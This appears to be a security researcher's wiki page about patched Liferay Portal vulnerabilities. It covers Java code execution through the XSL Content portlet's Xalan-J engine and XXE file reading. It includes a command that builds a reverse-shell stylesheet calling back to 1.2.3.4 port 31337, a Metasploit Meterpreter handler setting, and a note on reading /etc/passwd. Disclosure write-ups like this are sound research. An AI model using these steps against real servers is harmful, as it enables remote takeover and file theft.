Wiki source code of Application_Liferay

Last modified by Nicolas Gregoire on 2012/04/19 14:05
Hide last authors
Nicolas Gregoire 20.1 1 {{toc/}}
Nicolas Gregoire 1.1 2
Nicolas Gregoire 21.1 3 = Introduction =
Nicolas Gregoire 13.1 4
Nicolas Gregoire 20.1 5 Dixit [[Wikipedia>>http://en.wikipedia.org/wiki/Liferay||rel="__blank"]] : //"Liferay Portal is a free and open source enterprise portal written in Java and distributed under the GNU Lesser General Public License.[2] and proprietary licenses. It is primarily used to power corporate intranets and extranets. [...] Liferay Portal is Java based and runs on any computing platform capable of running the Java Runtime Environment and an application server. Liferay is available bundled with an servlet container such as Apache Tomcat."//
Nicolas Gregoire 13.1 6
7 The vulnerabilities described here were patched in version 6.0.6 GA (cf. the [[Release Notes for 6.0.6 GA>>http://issues.liferay.com/secure/ReleaseNote.jspa?version=10656&styleName=Html&projectId=10952||rel="__blank"]]).
8
Nicolas Gregoire 20.1 9 = Java code execution =
Nicolas Gregoire 3.1 10
Nicolas Gregoire 23.1 11 LIferay includes numerous portlets. The "XSL Content" portlet displays the result of the XSL transformation of a XML document. The XSLT engine used by default is [[Xalan-J>>Engine_XalanJ]] (but this can probably modified easily using [[JAXP>>http://en.wikipedia.org/wiki/Java_API_for_XML_Processing||rel="__blank"]]). As Xalan-J allows by default to execute Java code from the stylesheet, that's an easy to exploit vulnerability. Any logged-in user can execute arbitrary Java code in the context of the Web Application server (usually Tomcat) : [[CVE-2011-1571>>http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1571||rel="__blank"]].
Nicolas Gregoire 1.1 12
Nicolas Gregoire 17.1 13 Executing commands and reading the output (using the "xalanj-reading-stdout.xsl" script included on the [[Xalan-J>>Engine_XalanJ]] page) :
Nicolas Gregoire 9.1 14
15 [[image:liferay-execute-commands-with-stdout.png||style="display: block; margin-left: auto; margin-right: auto"]]
16
Nicolas Gregoire 24.1 17 = Meterpreter shell =
18
19 As described in [[Feature #6594: Liferay XSL Command Execution>>http://dev.metasploit.com/redmine/issues/6594||rel="__blank"]], here's a way to gain a Meterpreter shell with this vulnerability :
20
Nicolas Gregoire 25.1 21 - stand-alone JavaPayload to generate the XSLT stylesheet (java jar JavaPayload.jar Builder Template XalanJ.xsl output.xsl ReverseTCP 1.2.3.4 31337 - - JSh)
Nicolas Gregoire 24.1 22 - Metasploit to handle the Meterpreter connection (PAYLOAD=java/meterpreter/reverse_tcp)
23 - Manual interaction to trigger the vulnerability (browser)
24
Nicolas Gregoire 20.1 25 = Additional vulnerabilities =
Nicolas Gregoire 1.1 26
Nicolas Gregoire 3.1 27 Two others vulnerabilities were identified in the "XSL Content" portlet :
28
Nicolas Gregoire 20.1 29 * CVE-2011-1503 : allows to read XML files via a file:~/~/ URL (not mine !)
Nicolas Gregoire 1.1 30
31 * CVE-2011-1502 : allows to read UTF-8 files and to list directories via a XEE (XML External Entity) attack
Nicolas Gregoire 5.1 32
Nicolas Gregoire 19.1 33 Reading /etc/passwd using CVE-2011-1502 (cf attached files [[liferay-xee.xsl>>attach:liferay-xee.xsl]] and [[liferay-xee.xml>>attach:liferay-xee.xml]]) :
34
Nicolas Gregoire 5.1 35 [[image:liferay-read-etc-passwd-via-xee.png||style="display: block; margin-left: auto; margin-right: auto"]]